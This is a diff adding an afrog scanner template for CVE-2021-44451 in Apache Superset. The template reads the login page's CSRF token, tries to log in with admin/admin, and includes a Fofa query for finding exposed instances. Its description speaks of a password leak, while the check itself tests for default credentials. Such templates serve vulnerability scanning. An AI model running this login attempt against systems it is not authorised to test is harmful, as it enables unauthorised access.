■ ■ ■ ■ ■ ■
afrog-pocs/CVE/2021/CVE-2021-44451.yaml
| 1 | + | id: CVE-2021-44451 |
| 2 | + | |
| 3 | + | info: |
| 4 | + | name: Apache Superset Default Password |
| 5 | + | author: dhiyaneshDK |
| 6 | + | severity: high |
| 7 | + | description: | |
| 8 | + | Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. |
| 9 | + | Users should upgrade to Apache Superset 1.4.0 or higher. |
| 10 | + | Fofa: app="APACHE-Superset" |
| 11 | + | reference: |
| 12 | + | - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json |
| 13 | + | - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 |
| 14 | + | |
| 15 | + | set: |
| 16 | + | refererUrl: request.url |
| 17 | + | rules: |
| 18 | + | r0: |
| 19 | + | request: |
| 20 | + | method: GET |
| 21 | + | path: /login/ |
| 22 | + | expression: response.status == 200 |
| 23 | + | output: |
| 24 | + | search: '"value=\"(?P<cs_token>.*?)\">".bsubmatch(response.body)' |
| 25 | + | cs_token: search["cs_token"] |
| 26 | + | r1: |
| 27 | + | request: |
| 28 | + | method: POST |
| 29 | + | path: /login/ |
| 30 | + | headers: |
| 31 | + | Referer: "{{refererUrl}}/admin/airflow/login" |
| 32 | + | body: | |
| 33 | + | csrf_token={{cs_token}}&username=admin&password=admin |
| 34 | + | expression: response.status == 302 && response.body.bcontains(b'<title>Redirecting...</title>') && response.body.bcontains(b'<h1>Redirecting...</h1>') && response.body.bcontains(b'<a href="/">') && response.raw_header.bcontains(b'session') |
| 35 | + | expression: r0() && r1() |